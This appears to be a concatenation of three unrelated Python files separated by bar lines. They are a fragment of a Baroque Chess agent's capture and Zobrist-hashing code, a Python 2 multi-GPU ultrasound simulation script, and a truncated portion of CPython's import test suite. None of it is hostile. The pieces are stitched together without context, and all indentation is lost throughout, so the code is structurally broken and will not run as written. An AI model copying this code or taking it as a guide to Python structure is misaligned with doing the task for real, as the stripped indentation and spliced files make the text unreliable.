# We will assume that moving without capturing is not considered acceptable
boards = []
#boards = [(board, zhash)]
# Imitators capture by 'imitating' the piece to be captured
if piece_type == BLACK_IMITATOR:
# Imitators cannot imitate freezers or other imitators.
# They can imitate kings and leapers; however, those are already handled above.
if dr != 0 and dc != 0:
# Imitators cannot imitate pincers when moving diagonally
possiblePieces = set((whoseMove+BLACK_COORDINATOR,\
whoseMove+BLACK_WITHDRAWER))
else:
possiblePieces = set((whoseMove+BLACK_PINCER,\
whoseMove+BLACK_COORDINATOR,\
whoseMove+BLACK_WITHDRAWER))
# whoseMove is 0 for black and 1 for white.
# So, (BLACK_X + whoseMove) returns a black X if whoseMove is BLACK,
# and a white X if whoseMove is WHITE.
for otherPiece in possiblePieces:
# Note that capturablePieces below consists solely of
# the opposing counterpart to otherPiece
possibleBoards = apply_captures(board, zhash, old_r, old_c, new_r, new_c,\
otherPiece, [otherPiece ^ 1], whoseMove)
boards.extend(possibleBoards)
# Pincers capture by 'surrounding' opposing pieces
# NOTE: according to the spec, pincers can pinch using ANY friendly piece
# (not just other pincers)
elif piece_type == BLACK_PINCER:
directions = [(0,1), (1,0), (-1,0), (0,-1)]
new_board = copy_board(board)
new_hash = zhash
for (drow, dcol) in directions:
if valid_space(new_r + drow*2, new_c + dcol*2)\
and board[new_r+drow][new_c+dcol] in capturablePieces\
and board[new_r+drow*2][new_c+dcol*2] != EMPTY\
and who(board[new_r+drow*2][new_c+dcol*2]) == whoseMove:
new_board[new_r+drow][new_c+dcol] = EMPTY
new_hash = zhash ^ ZOB_TBL[(new_r+drow, new_c+dcol, board[new_r+drow][new_c+dcol])]
if new_hash != zhash:
boards.append((new_board, new_hash))
# Coordinators capture by 'coordinating' with the king
elif piece_type == BLACK_COORDINATOR:
(king_r, king_c) = friendly_king_position(board, whoseMove)
# Check the two spaces that the king and coordinator 'coordinate' together
new_board = copy_board(board)
new_hash = zhash
for (r,c) in [(new_r,king_c), (king_r,new_c)]:
if board[r][c] in capturablePieces:
new_board[r][c] = EMPTY
new_hash = zhash ^ ZOB_TBL[(r,c,board[r][c])]
if new_hash != zhash:
boards.append((new_board, new_hash))
# Withdrawers capture by 'withdrawing' from an opposing piece
elif piece_type == BLACK_WITHDRAWER:
# Check the space 'behind' the withdrawer
if valid_space(old_r - dr, old_c - dc)\
and board[old_r - dr][old_c - dc] in capturablePieces:
new_board = copy_board(board)
new_board[old_r - dr][old_c - dc] = EMPTY
new_hash = zhash ^ ZOB_TBL[(old_r-dr,old_c-dc,board[old_r-dr][old_c-dc])]
boards.append((new_board, new_hash))
if boards == []:
boards = [(board, zhash)]
return boards
def apply_move(board, zhash, old_r, old_c, new_r, new_c):
global ZOB_TBL, EMPTY
# Returns the move as ((old_r, old_c), (new_r, new_c)), a copy of the given board
# with the (non-capturing) move applied, and the incrementally updated Zobrist hash
new_hash = zhash
new_hash ^= ZOB_TBL[(new_r, new_c, board[new_r][new_c])]
new_hash ^= ZOB_TBL[(old_r, old_c, board[old_r][old_c])]
new_hash ^= ZOB_TBL[(new_r, new_c, board[old_r][old_c])]
new_board = copy_board(board)
new_board[new_r][new_c] = new_board[old_r][old_c]
new_board[old_r][old_c] = EMPTY
return ((old_r, old_c),(new_r, new_c)), new_board, new_hash
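# The three XORs above are the standard incremental Zobrist update: drop the hash
# contribution of whatever occupied the destination square, drop the moving piece
# from its old square, then add the moving piece on its new square. Since prepare()
# maps every (row, col, EMPTY) entry to 0, moves onto empty squares need no special case.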
def get_neighborhood(row, col):
# Returns a list of coordinates of the 8 spaces surrounding a given square.
# For an edge, only 5 spaces will be returned; for a corner, only 3.
spaces = [(r, c)\
for r in range(max(0,row-1), min(8,row+2))\
for c in range(max(0,col-1), min(8,col+2))\
if not (r == row and c == col)]
return spaces
def copy_board(board):
# Returns a deep copy of a given board.
return [[board[r][c] for c in range(len(board[0]))] for r in range(len(board))]
def friendly_king_position(board, whoseMove):
king = BLACK_KING ^ whoseMove
for row in range(len(board)):
for col in range(len(board[0])):
if board[row][col] == king:
return row,col
return None # Something has gone terribly wrong here
def nickname():
return "Rookoko"
def introduce():
return "I'm Rookoko, an exuberant Baroque Chess agent."
def prepare(player2Nickname):
global ZOB_TBL, ZOB_STATES, PIECES, EMPTY, TURNS, STATIC_BOARD, DYN_VALS, PUN_GENERATOR
TURNS = 0
STATIC_BOARD = dict()
PUN_GENERATOR = pun_generator()
for r in range(8):
for c in range(8):
#print(int(pos_val(r,c)*10)/10, end=' ')
for key in STATIC_VALUES.keys():
if key == EMPTY:
STATIC_BOARD[(r,c,key)] = (r-3.5)//2
else:
STATIC_BOARD[(r,c,key)] = pos_val(r,c)*(2*who(key)-1)*STATIC_VALUES[key]
#print()
# Set up Zobrist hashing - Assuming default board size 8 x 8
for row in range(8):
for col in range(8):
# Don't bother with a hash for the empty space
ZOB_TBL[(row, col, EMPTY)] = 0
for player in (BLACK, WHITE):
for piece in PIECES[player]:
ZOB_TBL[(row, col, piece)] = random.getrandbits(64)
return "Ready to rumble!"
# Compute the Zobrist hash of a board from scratch by XOR-ing the table entries of all occupied squares
def zob_hash(board):
global ZOB_TBL, EMPTY
hash_val = 0
for row in range(8):
for col in range(8):
if board[row][col] != EMPTY:
hash_val ^= ZOB_TBL[(row, col, board[row][col])]
return hash_val
|
demo_multi_gpu.py
|
import threading
import time
from linear_scan_phantom import do_simulation
import argparse
class Dummy:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("h5_file", help="Phantom to scan")
parser.add_argument("num_devices", help="Number of GPUs to use", type=int)
parser.add_argument("--save_pdf", action="store_true")
args = parser.parse_args()
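# Example invocation (hypothetical phantom file), scanning on two GPUs and saving PDFs:
#   python demo_multi_gpu.py phantom.h5 2 --save_pdf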
start_time = time.time()
# spawn one thread for each GPU
threads = []
for device_no in range(args.num_devices):
# set up common parameters for each GPU
params = Dummy()
params.h5_file = args.h5_file
params.x0 = -3e-2
params.x1 = 3e-2
params.num_lines = 512
params.num_frames = 1
params.visualize = False
params.use_gpu = True
params.save_simdata_file = ""
params.noise_ampl = 0
# specific parameters
if args.save_pdf:
params.pdf_file = "Res_GPU_device_%d.pdf" % device_no
else:
params.pdf_file = ""
params.device_no = device_no
t = threading.Thread(target=do_simulation, args=(params,))
t.start()
threads.append(t)
print "Waiting for all threads to finish...",
for thread in threads:
thread.join()
print "Done."
end_time = time.time()
elapsed_time = end_time-start_time
print "Total time elapsed: %f sec." % elapsed_time
print "Time per device: %f sec" % (elapsed_time/args.num_devices)
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import shutil
import contextlib
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, is_jython,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
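# Illustrative use of the helper above (FilePermissionTests below shows real call sites):
#   with _ready_to_import('spam', 'x = 1') as (name, path):
#       module = __import__(name)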
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError):
from test_from_import_AttributeError import does_not_exist
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
def delay_has_deadlock(frame, event, arg):
if event == 'call' and frame.f_code.co_name == 'has_deadlock':
time.sleep(0.05)
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
sys.settrace(delay_has_deadlock)
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
sys.settrace(None)
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(12)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = type(code)(code.co_argcount, code.co_kwonlyargcount,
code.co_nlocals, code.co_stacksize,
code.co_flags, code.co_code, tuple(constants),
code.co_names, code.co_varnames, code.co_filename,
code.co_name, code.co_firstlineno, code.co_lnotab,
code.co_freevars, code.co_cellvars)
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
